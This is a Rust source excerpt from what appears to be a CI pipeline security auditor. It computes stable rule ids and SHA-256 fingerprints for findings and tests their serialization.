656/// Snake-case rule id derived from a `FindingCategory`. Delegates to
657/// serde so the value tracks the serialized form across renames.
658fn category_rule_id(category: &FindingCategory) -> String {
659    serde_json::to_value(category)
660        .ok()
661        .and_then(|v| v.as_str().map(str::to_string))
662        .unwrap_or_else(|| "unknown".to_string())
663}
664
665/// Public, stable rule-id resolver for a finding.
666///
667/// Returns the snake_case rule id reported alongside this finding. When the
668/// finding's message starts with a bracketed custom-rule prefix
669/// (`[my_rule] ...`), the bracketed id wins so custom YAML rules surface
670/// their declared id. Otherwise the rule id is the snake_case form of the
671/// finding's `category` (the same string serde uses to serialize the
672/// category enum).
673///
674/// JSON, SARIF, and CloudEvents emitters all share this helper to ensure
675/// the `rule_id` field is identical across the three sinks.
676pub fn rule_id_for(finding: &Finding) -> String {
677    extract_custom_rule_id(&finding.message)
678        .map(str::to_string)
679        .unwrap_or_else(|| category_rule_id(&finding.category))
680}
681
682/// Compute a stable cross-run fingerprint for a finding.
683///
684/// The fingerprint identifies "the same logical issue" across re-runs and
685/// across non-cosmetic edits to the surrounding pipeline. Two runs against
686/// the same input file produce the same fingerprint; a fix to the
687/// underlying issue makes the fingerprint disappear; a tweak to the
688/// finding's user-facing message does NOT change the fingerprint.
689///
690/// **Algorithm version `v2`** (replaces v1 from v0.9.1).
691///
692/// v1 collapsed every per-hop finding against the same root Secret/Identity
693/// onto a single fingerprint. That hides genuinely distinct issues — two
694/// untrusted steps reaching the same secret are two separate
695/// remediation-distinct findings, not one. v2 makes every component of the
696/// finding contribute to the hash so unrelated findings cannot alias.
697///
698/// **Inputs (sensitive to):**
699///   * Rule id — either a custom rule id parsed from a `[id] …` message
700///     prefix, or the snake_case form of `finding.category`
701///   * Source file path (`graph.source.file`) — verbatim, never normalised
702///     to a basename, so two pipelines named the same file in different
703///     directories never collide
704///   * Finding category (snake_case)
705///   * Root-authority node name — Secret/Identity name when one is
706///     involved, empty string otherwise. Surfaces the credential identity
707///     in the SIEM context column without being the only differentiator.
708///   * Ordered involved-node names — every node in `nodes_involved`,
709///     joined in original order (preserves caller intent so per-hop
710///     findings against the same secret produce distinct fingerprints).
711///
712/// **Inputs (insensitive to):**
713///   * Wall-clock time
714///   * The finding's `message` text — operators tweak phrasing without
715///     wanting suppressions to break
716///   * `taudit` version string
717///   * Environment / host / cwd
718///   * Pipeline file content hash — only the path matters
719///
720/// Stability guarantee: the v2 algorithm is stable for the v0.10+ line.
721/// Pre-v0.10 (v1 algorithm) suppressions DO NOT carry forward — a one-time
722/// re-baselining is required when upgrading. CHANGELOG and
723/// `docs/finding-fingerprint.md` flag the break explicitly.
724///
725/// Output: SHA-256 of the canonical input string, truncated to the first
726/// 16 hex characters (64 bits — collision-resistant enough for finding
727/// dedup, short enough to be human-glanceable in a SIEM table).
728pub fn compute_fingerprint(finding: &Finding, graph: &AuthorityGraph) -> String {
729    let rule_id = extract_custom_rule_id(&finding.message)
730        .map(str::to_string)
731        .unwrap_or_else(|| category_rule_id(&finding.category));
732
733    let category = category_rule_id(&finding.category);
734    let file = graph.source.file.as_str();
735
736    // Root authority name (if any) — always emitted as its own component,
737    // empty string when no Secret/Identity is involved. Distinct field so
738    // a finding whose root_authority differs from a sibling's is
739    // recognisably different even when the involved-node list happens to
740    // overlap.
741    let root_authority: String = finding
742        .nodes_involved
743        .iter()
744        .filter_map(|id| graph.node(*id))
745        .find(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
746        .map(|n| n.name.clone())
747        .unwrap_or_default();
748
749    // Ordered involved-node names. Order is preserved (NOT sorted) — for
750    // authority_propagation findings the convention is `[source, sink]`,
751    // so two findings hitting the same secret but reaching different
752    // untrusted steps produce different fingerprints (the v1 collision
753    // class). Empty string when no nodes are involved.
754    let nodes_ordered: String = finding
755        .nodes_involved
756        .iter()
757        .filter_map(|id| graph.node(*id))
758        .map(|n| n.name.as_str())
759        .collect::<Vec<_>>()
760        .join(",");
761
762    // Canonical encoding: every component prefixed with a tag and joined
763    // by `\x1f` (ASCII unit separator) so component boundaries cannot
764    // alias across inputs. Algorithm version baked into the prefix so a
765    // future change to the contract is detectable from the canonical
766    // string alone.
767    let canonical = format!(
768        "v2\x1frule={rule_id}\x1ffile={file}\x1fcategory={category}\x1froot={root_authority}\x1fnodes={nodes_ordered}"
769    );
770
771    let digest = Sha256::digest(canonical.as_bytes());
772    let mut out = String::with_capacity(16);
773    for byte in &digest[..8] {
774        use std::fmt::Write;
775        // 8 bytes -> 16 hex chars
776        let _ = write!(&mut out, "{byte:02x}");
777    }
778    out
779}
780
// Unit tests for the v2 fingerprint contract, the UUID v5 group-id helper,
// and the `Finding` builder helpers.
#[cfg(test)]
mod fingerprint_tests {
    use super::*;
    use crate::graph::{AuthorityGraph, NodeKind, PipelineSource, TrustZone};

    // Minimal `PipelineSource` for tests: only `file` is populated — the
    // fingerprint contract reads nothing but the path.
    fn source(file: &str) -> PipelineSource {
        PipelineSource {
            file: file.to_string(),
            repo: None,
            git_ref: None,
            commit_sha: None,
        }
    }

    // Finding with fixed severity / recommendation / source so only the
    // inputs under test (category, message, nodes) vary between cases.
    fn make_finding(category: FindingCategory, msg: &str, nodes: Vec<NodeId>) -> Finding {
        Finding {
            severity: Severity::High,
            category,
            path: None,
            nodes_involved: nodes,
            message: msg.to_string(),
            recommendation: Recommendation::Manual {
                action: "fix it".to_string(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        }
    }

    #[test]
    fn fingerprint_is_stable_across_repeat_calls() {
        // Determinism + output shape: 16 lowercase-hex chars, identical on
        // every call for the same (finding, graph) pair.
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let s = graph.add_node(NodeKind::Secret, "AWS_KEY", TrustZone::FirstParty);
        let f = make_finding(
            FindingCategory::AuthorityPropagation,
            "AWS_KEY reaches third party",
            vec![s],
        );
        let a = compute_fingerprint(&f, &graph);
        let b = compute_fingerprint(&f, &graph);
        assert_eq!(a, b, "same finding must hash identically across calls");
        assert_eq!(a.len(), 16, "fingerprint is 16 hex chars");
        assert!(a.chars().all(|c| c.is_ascii_hexdigit()));
    }

    #[test]
    fn different_files_produce_different_fingerprints() {
        // The file path is a fingerprint input — same secret name + same
        // message in two files must not collide.
        let mut g_a = AuthorityGraph::new(source("workflows/a.yml"));
        let mut g_b = AuthorityGraph::new(source("workflows/b.yml"));
        let s_a = g_a.add_node(NodeKind::Secret, "TOKEN", TrustZone::FirstParty);
        let s_b = g_b.add_node(NodeKind::Secret, "TOKEN", TrustZone::FirstParty);
        let f_a = make_finding(FindingCategory::UnpinnedAction, "msg", vec![s_a]);
        let f_b = make_finding(FindingCategory::UnpinnedAction, "msg", vec![s_b]);
        assert_ne!(
            compute_fingerprint(&f_a, &g_a),
            compute_fingerprint(&f_b, &g_b)
        );
    }

    #[test]
    fn different_rules_produce_different_fingerprints() {
        // The rule id (here: the category fallback) is a fingerprint input.
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let s = graph.add_node(NodeKind::Secret, "AWS_KEY", TrustZone::FirstParty);
        let f1 = make_finding(FindingCategory::AuthorityPropagation, "msg", vec![s]);
        let f2 = make_finding(FindingCategory::UntrustedWithAuthority, "msg", vec![s]);
        assert_ne!(
            compute_fingerprint(&f1, &graph),
            compute_fingerprint(&f2, &graph)
        );
    }

    #[test]
    fn message_changes_do_not_affect_fingerprint() {
        // The whole point of cross-run dedup: an operator can re-word
        // the message text without breaking SIEM suppressions.
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let s = graph.add_node(NodeKind::Secret, "AWS_KEY", TrustZone::FirstParty);
        let f1 = make_finding(
            FindingCategory::AuthorityPropagation,
            "old phrasing of the message",
            vec![s],
        );
        let f2 = make_finding(
            FindingCategory::AuthorityPropagation,
            "completely different new phrasing",
            vec![s],
        );
        assert_eq!(
            compute_fingerprint(&f1, &graph),
            compute_fingerprint(&f2, &graph)
        );
    }

    #[test]
    fn per_hop_findings_against_same_authority_are_distinct() {
        // v2 contract: a single secret reaching N distinct untrusted steps
        // produces N distinct fingerprints. Each (secret, step) pair is its
        // own remediation-distinct finding — collapsing them (the v1
        // behaviour) hid genuinely different exposure surfaces. SIEMs that
        // want a per-secret rollup can group on root_authority client-side.
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let secret = graph.add_node(NodeKind::Secret, "DEPLOY_TOKEN", TrustZone::FirstParty);
        let step_a = graph.add_node(NodeKind::Step, "deploy[0]", TrustZone::Untrusted);
        let step_b = graph.add_node(NodeKind::Step, "deploy[1]", TrustZone::Untrusted);

        let f_a = make_finding(
            FindingCategory::AuthorityPropagation,
            "DEPLOY_TOKEN reaches deploy[0]",
            vec![secret, step_a],
        );
        let f_b = make_finding(
            FindingCategory::AuthorityPropagation,
            "DEPLOY_TOKEN reaches deploy[1]",
            vec![secret, step_b],
        );
        assert_ne!(
            compute_fingerprint(&f_a, &graph),
            compute_fingerprint(&f_b, &graph),
            "per-hop findings against one secret must produce distinct \
             fingerprints — sink identity is part of the issue"
        );
    }

    #[test]
    fn same_secret_same_sink_remains_stable_across_calls() {
        // Re-running the SAME finding (same secret, same sink, same file)
        // must still produce the same fingerprint — that is the entire
        // point of cross-run dedup. The v2 change adds inputs but does not
        // introduce non-determinism.
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let secret = graph.add_node(NodeKind::Secret, "DEPLOY_TOKEN", TrustZone::FirstParty);
        let step = graph.add_node(NodeKind::Step, "deploy[0]", TrustZone::Untrusted);
        let f = make_finding(
            FindingCategory::AuthorityPropagation,
            "msg",
            vec![secret, step],
        );
        assert_eq!(
            compute_fingerprint(&f, &graph),
            compute_fingerprint(&f, &graph)
        );
    }

    #[test]
    fn r2_attack2_two_files_same_secret_name_distinct_fingerprints() {
        // R2 attack #2 reproducer: two genuinely different findings in two
        // different pipeline files that share a secret NAME must produce
        // different fingerprints. The earlier (pre-v0.9.1) algorithm could
        // collide here; the v2 algorithm explicitly includes file path so
        // the names cannot alias across files.
        let mut g_a = AuthorityGraph::new(source("workflows/a.yml"));
        let mut g_b = AuthorityGraph::new(source("workflows/b.yml"));
        let s_a = g_a.add_node(NodeKind::Secret, "MY_SECRET", TrustZone::FirstParty);
        let sink_a = g_a.add_node(NodeKind::Step, "evil/action", TrustZone::Untrusted);
        let s_b = g_b.add_node(NodeKind::Secret, "MY_SECRET", TrustZone::FirstParty);
        let sink_b = g_b.add_node(
            NodeKind::Step,
            "different-evil/action",
            TrustZone::Untrusted,
        );

        let f_a = make_finding(
            FindingCategory::AuthorityPropagation,
            "MY_SECRET reaches evil/action",
            vec![s_a, sink_a],
        );
        let f_b = make_finding(
            FindingCategory::AuthorityPropagation,
            "MY_SECRET reaches different-evil/action",
            vec![s_b, sink_b],
        );
        assert_ne!(
            compute_fingerprint(&f_a, &g_a),
            compute_fingerprint(&f_b, &g_b),
            "two genuinely different findings must not share a fingerprint \
             just because the secret name overlaps"
        );
    }

    #[test]
    fn root_authority_segment_is_always_present_even_when_empty() {
        // Findings without any Secret/Identity (e.g. floating_image) MUST
        // still produce a stable fingerprint. The empty-root case is its
        // own equivalence class — two such findings with the same node
        // list collapse to the same fingerprint; differing node lists
        // produce different fingerprints.
        let mut g = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let img_a = g.add_node(NodeKind::Image, "alpine:latest", TrustZone::ThirdParty);
        let img_b = g.add_node(NodeKind::Image, "ubuntu:22.04", TrustZone::ThirdParty);
        let f_a = make_finding(FindingCategory::FloatingImage, "msg-a", vec![img_a]);
        let f_b = make_finding(FindingCategory::FloatingImage, "msg-b", vec![img_b]);
        let fp_a = compute_fingerprint(&f_a, &g);
        let fp_b = compute_fingerprint(&f_b, &g);
        assert_ne!(
            fp_a, fp_b,
            "two distinct floating-image findings must not collide"
        );
        assert_eq!(fp_a.len(), 16);
        assert_eq!(fp_b.len(), 16);
    }

    #[test]
    fn node_order_is_significant() {
        // The fingerprint preserves caller order in nodes_involved. A
        // finding emitted as [secret, step] is semantically different from
        // [step, secret] (source vs sink role) and produces a different
        // fingerprint. Rules must therefore stay consistent in the order
        // they push nodes — every built-in does today.
        let mut g = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let s = g.add_node(NodeKind::Secret, "K", TrustZone::FirstParty);
        let step = g.add_node(NodeKind::Step, "use", TrustZone::Untrusted);
        let forward = make_finding(FindingCategory::AuthorityPropagation, "x", vec![s, step]);
        let reverse = make_finding(FindingCategory::AuthorityPropagation, "x", vec![step, s]);
        assert_ne!(
            compute_fingerprint(&forward, &g),
            compute_fingerprint(&reverse, &g),
            "node order must influence the fingerprint so role swap is detectable"
        );
    }

    #[test]
    fn custom_rule_id_in_message_is_used() {
        // Custom rules carry id in `[id] message` prefix; fingerprint
        // must key on the custom id, not the category fallback.
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let s = graph.add_node(NodeKind::Secret, "X", TrustZone::FirstParty);
        let f_custom = make_finding(
            FindingCategory::UnpinnedAction,
            "[my_custom_rule] something happened",
            vec![s],
        );
        let f_plain = make_finding(FindingCategory::UnpinnedAction, "no prefix here", vec![s]);
        assert_ne!(
            compute_fingerprint(&f_custom, &graph),
            compute_fingerprint(&f_plain, &graph),
            "custom rule id must distinguish from category fallback"
        );
    }

    #[test]
    fn finding_group_id_is_deterministic_uuid_v5() {
        // Same fingerprint -> same group id, byte-identical.
        let g1 = compute_finding_group_id("5edb30f4db3b5fa3");
        let g2 = compute_finding_group_id("5edb30f4db3b5fa3");
        assert_eq!(g1, g2);
        // UUID v5 shape: 8-4-4-4-12 hex chars with version=5 nibble.
        assert_eq!(g1.len(), 36);
        // Position 14 is the version nibble — must be '5' for v5.
        assert_eq!(
            g1.chars().nth(14),
            Some('5'),
            "expected v5 marker, got {g1}"
        );
        // Position 19 is the variant nibble — must be one of 8/9/a/b.
        let variant = g1.chars().nth(19).unwrap();
        assert!(
            matches!(variant, '8' | '9' | 'a' | 'b'),
            "expected RFC 4122 variant, got {variant}"
        );
        // Different fingerprint -> different group id.
        assert_ne!(g1, compute_finding_group_id("a3c8d9e1f2b4c5d6"));
    }

    #[test]
    fn with_time_to_fix_attaches_effort() {
        // Builder helper stores the effort estimate in `extras`.
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let s = graph.add_node(NodeKind::Secret, "X", TrustZone::FirstParty);
        let f = make_finding(FindingCategory::UnpinnedAction, "msg", vec![s])
            .with_time_to_fix(FixEffort::Trivial);
        assert_eq!(f.extras.time_to_fix, Some(FixEffort::Trivial));
    }

    #[test]
    fn with_compensating_control_downgrades_and_records_original() {
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let s = graph.add_node(NodeKind::Secret, "X", TrustZone::FirstParty);
        let f = make_finding(FindingCategory::TriggerContextMismatch, "msg", vec![s])
            .with_compensating_control("fork check present");
        // Default High in make_finding -> downgraded to Medium.
        assert_eq!(f.severity, Severity::Medium);
        assert_eq!(f.extras.original_severity, Some(Severity::High));
        assert_eq!(f.extras.compensating_controls.len(), 1);
    }

    #[test]
    fn empty_node_list_still_produces_fingerprint() {
        // Categories like authority_cycle, floating_image, unpinned_action
        // may not carry an authority node — fingerprint must still work.
        let graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let f = make_finding(FindingCategory::UnpinnedAction, "no nodes here", vec![]);
        let fp = compute_fingerprint(&f, &graph);
        assert_eq!(fp.len(), 16);
        assert!(fp.chars().all(|c| c.is_ascii_hexdigit()));
    }
}
1076
// Serialization round-trip tests for `FindingSource` provenance, including
// the legacy-JSON backward-compat path (missing field -> BuiltIn).
#[cfg(test)]
mod source_tests {
    use super::*;

    #[test]
    fn built_in_serializes_as_string() {
        // BuiltIn is a bare string variant, not an object.
        let s = FindingSource::BuiltIn;
        let v = serde_json::to_value(&s).unwrap();
        assert_eq!(v, serde_json::json!("built-in"));
    }

    #[test]
    fn custom_serializes_with_path_payload() {
        // Custom carries the loader path as a nested object payload.
        let s = FindingSource::Custom {
            source_file: PathBuf::from("/policies/no_prod_pat.yml"),
        };
        let v = serde_json::to_value(&s).unwrap();
        assert_eq!(
            v,
            serde_json::json!({"custom": {"source_file": "/policies/no_prod_pat.yml"}})
        );
    }

    #[test]
    fn finding_round_trip_preserves_built_in_source() {
        let f = Finding {
            severity: Severity::High,
            category: FindingCategory::AuthorityPropagation,
            path: None,
            nodes_involved: vec![],
            message: "x".into(),
            recommendation: Recommendation::Manual {
                action: "fix".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        };
        let s = serde_json::to_string(&f).unwrap();
        // Encoded as the literal `"source":"built-in"` — operators eyeballing
        // raw JSON immediately see "this is a shipped rule".
        assert!(
            s.contains("\"source\":\"built-in\""),
            "built-in source must serialise as \"built-in\": {s}"
        );
        let f2: Finding = serde_json::from_str(&s).unwrap();
        assert_eq!(f2.source, FindingSource::BuiltIn);
    }

    #[test]
    fn finding_round_trip_preserves_custom_source_with_path() {
        let path = PathBuf::from("/work/invariants/no_prod_pat.yml");
        let f = Finding {
            severity: Severity::Critical,
            category: FindingCategory::AuthorityPropagation,
            path: None,
            nodes_involved: vec![],
            message: "[no_prod_pat] hit".into(),
            recommendation: Recommendation::Manual {
                action: "fix".into(),
            },
            source: FindingSource::Custom {
                source_file: path.clone(),
            },
            extras: FindingExtras::default(),
        };
        let s = serde_json::to_string(&f).unwrap();
        assert!(
            s.contains("\"custom\""),
            "custom source must serialise with `custom` key: {s}"
        );
        assert!(
            s.contains("/work/invariants/no_prod_pat.yml"),
            "custom source must include the loader path: {s}"
        );
        let f2: Finding = serde_json::from_str(&s).unwrap();
        assert_eq!(
            f2.source,
            FindingSource::Custom { source_file: path },
            "round-trip must preserve custom source path"
        );
    }

    #[test]
    fn missing_source_field_deserializes_as_built_in() {
        // Backward-compat: pre-provenance JSON omits the field entirely; the
        // serde default makes it `BuiltIn`. Without this, every old
        // suppression DB would fail to parse on upgrade.
        let json = r#"{
            "severity": "high",
            "category": "authority_propagation",
            "nodes_involved": [],
            "message": "old-format finding",
            "recommendation": {"type": "manual", "action": "review"}
        }"#;
        let f: Finding = serde_json::from_str(json).expect("legacy JSON must parse");
        assert_eq!(f.source, FindingSource::BuiltIn);
    }
}
1174}